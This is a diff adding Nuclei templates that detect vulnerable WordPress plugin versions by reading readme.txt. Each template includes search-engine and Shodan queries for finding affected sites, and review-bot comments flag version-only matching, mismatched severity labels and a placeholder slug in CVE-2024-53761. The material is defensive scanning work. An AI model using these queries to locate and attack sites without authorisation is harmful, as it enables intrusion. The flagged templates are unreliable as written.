+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "third-party-cookie-eraser"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
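Review bot: The only evidence this template collects is the `Stable tag` value in `readme.txt`, so a match means the installed version is in the affected range, not that the CSRF-to-XSS path was confirmed, and nothing in `info` or the request block says so. I would add a comment above `http:` such as `# Version-based detection only: compares the readme.txt "Stable tag" with the affected range; the vulnerable handler is not exercised.` so that triage treats hits as patch-status leads. The inverse also holds: a readme with `Stable tag: trunk`, a stale tag, or a blocked `readme.txt` yields no result, which is not evidence of a fixed install. The same applies to the other templates added in this diff, CVE-2024-53756 through CVE-2024-53770.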
diff --git a/poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml b/poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml
new file mode 100644
index 0000000000..975ac496f3
--- /dev/null
+++ b/poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644
+
+info:
+ name: >
+ Vertical Carousel <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Vertical Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ae463ae-5bfb-4e7c-9f84-edaa9a826ffa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53756
+ metadata:
+ fofa-query: "wp-content/plugins/vertical-carousel-slider/"
+ google-query: inurl:"/wp-content/plugins/vertical-carousel-slider/"
+ shodan-query: 'vuln:CVE-2024-53756'
+ tags: cve,wordpress,wp-plugin,vertical-carousel-slider,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/vertical-carousel-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "vertical-carousel-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
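Review bot: `severity: low` disagrees with the classification a few lines below it, where `cvss-score: 6.4` falls in the CVSS 3.1 Medium band (4.0–6.9), and the trailing `low` tag repeats the mismatch. Anyone filtering scan results by severity would drop this finding although the score says otherwise. I would use `severity: medium` and end the tag list with `medium`, or, if the downgrade for contributor-level issues is deliberate, say so in a comment next to `severity`. The same pair of values appears in CVE-2024-53757, -53758, -53760, -53763, -53764, -53766 and -53767.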
diff --git a/poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml b/poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml
new file mode 100644
index 0000000000..f72dab3c90
--- /dev/null
+++ b/poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53757-9e5a50025a96a90d40bab8055add551b
+
+info:
+ name: >
+ WP Find Your Nearest <= 0.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Find Your Nearest plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f348e019-d4b5-4384-8ee9-117694259b92?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53757
+ metadata:
+ fofa-query: "wp-content/plugins/wp-find-your-nearest/"
+ google-query: inurl:"/wp-content/plugins/wp-find-your-nearest/"
+ shodan-query: 'vuln:CVE-2024-53757'
+ tags: cve,wordpress,wp-plugin,wp-find-your-nearest,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-find-your-nearest/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-find-your-nearest"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml b/poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml
new file mode 100644
index 0000000000..4d9fe97ecb
--- /dev/null
+++ b/poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53758-ebe442ae0c94160a0452474317b40359
+
+info:
+ name: >
+ WP MathJax <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP MathJax plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0bb89c-6c56-4037-8a55-487244e8d519?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53758
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mathjax-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-mathjax-plus/"
+ shodan-query: 'vuln:CVE-2024-53758'
+ tags: cve,wordpress,wp-plugin,wp-mathjax-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mathjax-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mathjax-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml b/poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
new file mode 100644
index 0000000000..132f83f96a
--- /dev/null
+++ b/poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3
+
+info:
+ name: >
+ ArCa Payment Gateway <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ArCa Payment Gateway plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ec069ef-7b53-47b5-93bc-92cfc2d62c88?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-53759
+ metadata:
+ fofa-query: "wp-content/plugins/arca-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/arca-payment-gateway/"
+ shodan-query: 'vuln:CVE-2024-53759'
+ tags: cve,wordpress,wp-plugin,arca-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arca-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arca-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml b/poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml
new file mode 100644
index 0000000000..cc6dbfc25a
--- /dev/null
+++ b/poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53760-491bf87c29a91b27218dea79d03b2338
+
+info:
+ name: >
+ Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Capitalize My Title plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53760
+ metadata:
+ fofa-query: "wp-content/plugins/capitalize-my-title/"
+ google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
+ shodan-query: 'vuln:CVE-2024-53760'
+ tags: cve,wordpress,wp-plugin,capitalize-my-title,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "capitalize-my-title"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml b/poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml
new file mode 100644
index 0000000000..11a8b5789a
--- /dev/null
+++ b/poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a
+
+info:
+ name: >
+ WP Revisions Manager <= 1.0.2 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Revisions Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/96a5db79-a88d-4c1f-9da4-6dd3120ff85e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53761
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:CVE-2024-53761'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
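Review bot: The plugin slug in this template is the literal `Plugin`, which looks like an unfilled generator placeholder: it appears in `path` (`/wp-content/plugins/Plugin/readme.txt`), in the `fofa-query` and `google-query` metadata, in `tags`, and as the word matcher. As written the request does not target the WP Revisions Manager directory, so affected installs will not be reported, and the word `Plugin` is generic enough to match unrelated readme bodies. Each occurrence should be replaced with the plugin's real directory name from the advisory, e.g. `- "{{BaseURL}}/wp-content/plugins/<plugin-slug>/readme.txt"` and `- "<plugin-slug>"`, where `<plugin-slug>` is a placeholder for a value this page does not show.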
diff --git a/poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml b/poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml
new file mode 100644
index 0000000000..41b81bc624
--- /dev/null
+++ b/poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53762-f6f324446de244136f8f61b504284d66
+
+info:
+ name: >
+ FastBook – Responsive Appointment Booking and Scheduling System <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The FastBook – Responsive Appointment Booking and Scheduling System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5fd2255-7f02-4de8-b904-a753580123b9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53762
+ metadata:
+ fofa-query: "wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ google-query: inurl:"/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ shodan-query: 'vuln:CVE-2024-53762'
+ tags: cve,wordpress,wp-plugin,fastbook-responsive-appointment-booking-and-scheduling-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fastbook-responsive-appointment-booking-and-scheduling-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml b/poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml
new file mode 100644
index 0000000000..1ceb858114
--- /dev/null
+++ b/poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4
+
+info:
+ name: >
+ Best Addons for Elementor <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Best Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/559165ed-f7f6-4f5a-ad37-8a2d53924888?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53763
+ metadata:
+ fofa-query: "wp-content/plugins/best-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/best-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53763'
+ tags: cve,wordpress,wp-plugin,best-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/best-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "best-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml b/poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml
new file mode 100644
index 0000000000..9ae847d88c
--- /dev/null
+++ b/poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668
+
+info:
+ name: >
+ Softtemplates For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Softtemplates For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0db63414-b8c3-41bf-a6df-4b6113ea7388?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53764
+ metadata:
+ fofa-query: "wp-content/plugins/softtemplates-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/softtemplates-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53764'
+ tags: cve,wordpress,wp-plugin,softtemplates-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/softtemplates-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "softtemplates-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml b/poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml
new file mode 100644
index 0000000000..712e2a8d90
--- /dev/null
+++ b/poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2
+
+info:
+ name: >
+ Mins To Read <= 1.2.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Mins To Read plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5a595e05-c017-4f6a-995d-a6226c5a19b1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53765
+ metadata:
+ fofa-query: "wp-content/plugins/mins-to-read/"
+ google-query: inurl:"/wp-content/plugins/mins-to-read/"
+ shodan-query: 'vuln:CVE-2024-53765'
+ tags: cve,wordpress,wp-plugin,mins-to-read,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mins-to-read/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mins-to-read"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml b/poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml
new file mode 100644
index 0000000000..734a1e08d9
--- /dev/null
+++ b/poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53766-2940cf0523c9b377de42a03a2c813390
+
+info:
+ name: >
+ Devnex Addons For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Devnex Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c179cb56-6d18-4e04-8539-3834a286e302?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53766
+ metadata:
+ fofa-query: "wp-content/plugins/devnex-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/devnex-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53766'
+ tags: cve,wordpress,wp-plugin,devnex-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/devnex-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "devnex-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml b/poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml
new file mode 100644
index 0000000000..ac601c1cdc
--- /dev/null
+++ b/poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435
+
+info:
+ name: >
+ Pixobe Cartography <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Pixobe Cartography plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c6949f9-316c-4e48-a77a-ace793d329ac?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53767
+ metadata:
+ fofa-query: "wp-content/plugins/pixobe-cartography/"
+ google-query: inurl:"/wp-content/plugins/pixobe-cartography/"
+ shodan-query: 'vuln:CVE-2024-53767'
+ tags: cve,wordpress,wp-plugin,pixobe-cartography,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pixobe-cartography/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pixobe-cartography"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml b/poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml
new file mode 100644
index 0000000000..b536e51fab
--- /dev/null
+++ b/poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6
+
+info:
+ name: >
+ Content Audit Exporter <= 1.1 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Content Audit Exporter plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6f8837-813c-4e16-9adb-fdc90ccaf0ca?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-53768
+ metadata:
+ fofa-query: "wp-content/plugins/content-audit-exporter/"
+ google-query: inurl:"/wp-content/plugins/content-audit-exporter/"
+ shodan-query: 'vuln:CVE-2024-53768'
+ tags: cve,wordpress,wp-plugin,content-audit-exporter,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/content-audit-exporter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "content-audit-exporter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
